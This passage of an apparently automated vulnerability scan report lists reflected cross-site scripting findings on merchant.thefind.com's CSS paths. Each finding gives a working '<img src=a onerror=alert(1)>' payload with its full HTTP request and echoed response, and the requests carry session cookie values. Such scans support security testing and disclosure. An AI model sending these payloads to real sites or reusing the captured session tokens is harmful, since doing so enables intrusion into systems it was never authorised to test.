User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:39 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
Content-Length: 85
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

[Could not find component: cssd2620<img src=a onerror=alert(1)>2d3f854f0fa.mc.common]

1.14. https://merchant.thefind.com/css/mc/common.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/common.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f252<img%20src%3da%20onerror%3dalert(1)>541134908ef was submitted in the REST URL parameter 2. This input was echoed as 7f252<img src=a onerror=alert(1)>541134908ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/mc7f252<img%20src%3da%20onerror%3dalert(1)>541134908ef/common.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

1.15. https://merchant.thefind.com/css/mc/common.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/common.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 74556<img%20src%3da%20onerror%3dalert(1)>5742eae8a6e was submitted in the REST URL parameter 3. This input was echoed as 74556<img src=a onerror=alert(1)>5742eae8a6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/mc/74556<img%20src%3da%20onerror%3dalert(1)>5742eae8a6e HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:01 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9544

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: css.mc.74556<img src=a onerror=alert(1)>5742eae8a6e]
</div>
...[SNIP]...

1.16. https://merchant.thefind.com/css/mc/layout.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/layout.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57b34<img%20src%3da%20onerror%3dalert(1)>2c50bc4a417 was submitted in the REST URL parameter 1. This input was echoed as 57b34<img src=a onerror=alert(1)>2c50bc4a417 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css57b34<img%20src%3da%20onerror%3dalert(1)>2c50bc4a417/mc/layout.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:19 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
Content-Length: 85
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

[Could not find component: css57b34<img src=a onerror=alert(1)>2c50bc4a417.mc.layout]

1.17. https://merchant.thefind.com/css/mc/layout.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/layout.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7129<img%20src%3da%20onerror%3dalert(1)>677e6ffe28a was submitted in the REST URL parameter 2. This input was echoed as c7129<img src=a onerror=alert(1)>677e6ffe28a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/mcc7129<img%20src%3da%20onerror%3dalert(1)>677e6ffe28a/layout.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:34 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
Content-Length: 85
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

[Could not find component: css.mcc7129<img src=a onerror=alert(1)>677e6ffe28a.layout]

1.18. https://merchant.thefind.com/css/mc/layout.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/layout.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b320b<img%20src%3da%20onerror%3dalert(1)>30bf34fd2ed was submitted in the REST URL parameter 3. This input was echoed as b320b<img src=a onerror=alert(1)>30bf34fd2ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/mc/b320b<img%20src%3da%20onerror%3dalert(1)>30bf34fd2ed HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:50 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9544

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: css.mc.b320b<img src=a onerror=alert(1)>30bf34fd2ed]
</div>
...[SNIP]...

1.19. https://merchant.thefind.com/css/mc/mc_common.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/mc_common.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5aea<img%20src%3da%20onerror%3dalert(1)>d8d00e90dc0 was submitted in the REST URL parameter 1. This input was echoed as c5aea<img src=a onerror=alert(1)>d8d00e90dc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cssc5aea<img%20src%3da%20onerror%3dalert(1)>d8d00e90dc0/mc/mc_common.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:32 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
Content-Length: 88
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

[Could not find component: cssc5aea<img src=a onerror=alert(1)>d8d00e90dc0.mc.mc_common]

1.20. https://merchant.thefind.com/css/mc/mc_common.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/mc_common.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6269<img%20src%3da%20onerror%3dalert(1)>bad336d9dd1 was submitted in the REST URL parameter 2. This input was echoed as f6269<img src=a onerror=alert(1)>bad336d9dd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/mcf6269<img%20src%3da%20onerror%3dalert(1)>bad336d9dd1/mc_common.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

1.21. https://merchant.thefind.com/css/mc/mc_common.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/mc_common.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bd8fd<img%20src%3da%20onerror%3dalert(1)>fde2bc89f4c was submitted in the REST URL parameter 3. This input was echoed as bd8fd<img src=a onerror=alert(1)>fde2bc89f4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/mc/bd8fd<img%20src%3da%20onerror%3dalert(1)>fde2bc89f4c HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:17 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9544

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: css.mc.bd8fd<img src=a onerror=alert(1)>fde2bc89f4c]
</div>
...[SNIP]...

1.22. https://merchant.thefind.com/css/ui/infobox.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/ui/infobox.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 65f67<img%20src%3da%20onerror%3dalert(1)>b63d56fcf40 was submitted in the REST URL parameter 1. This input was echoed as 65f67<img src=a onerror=alert(1)>b63d56fcf40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css65f67<img%20src%3da%20onerror%3dalert(1)>b63d56fcf40/ui/infobox.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

1.23. https://merchant.thefind.com/css/ui/infobox.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/ui/infobox.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bde46<img%20src%3da%20onerror%3dalert(1)>276ea5f8947 was submitted in the REST URL parameter 2. This input was echoed as bde46<img src=a onerror=alert(1)>276ea5f8947 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/uibde46<img%20src%3da%20onerror%3dalert(1)>276ea5f8947/infobox.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

1.24. https://merchant.thefind.com/css/ui/infobox.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/ui/infobox.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 314e0<img%20src%3da%20onerror%3dalert(1)>3ef2acf9a0 was submitted in the REST URL parameter 3. This input was echoed as 314e0<img src=a onerror=alert(1)>3ef2acf9a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/ui/314e0<img%20src%3da%20onerror%3dalert(1)>3ef2acf9a0 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:52 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9543

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: css.ui.314e0<img src=a onerror=alert(1)>3ef2acf9a0]
</div>
...[SNIP]...

1.25. https://merchant.thefind.com/css/utils/ui.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/utils/ui.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a40e8<img%20src%3da%20onerror%3dalert(1)>4a3f5c56078 was submitted in the REST URL parameter 1. This input was echoed as a40e8<img src=a onerror=alert(1)>4a3f5c56078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cssa40e8<img%20src%3da%20onerror%3dalert(1)>4a3f5c56078/utils/ui.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:17 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
Content-Length: 84
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

[Could not find component: cssa40e8<img src=a onerror=alert(1)>4a3f5c56078.utils.ui]

1.26. https://merchant.thefind.com/css/utils/ui.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/utils/ui.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32f84<img%20src%3da%20onerror%3dalert(1)>eb203fa84c was submitted in the REST URL parameter 2. This input was echoed as 32f84<img src=a onerror=alert(1)>eb203fa84c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/utils32f84<img%20src%3da%20onerror%3dalert(1)>eb203fa84c/ui.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:33 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
Content-Length: 83
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

[Could not find component: css.utils32f84<img src=a onerror=alert(1)>eb203fa84c.ui]

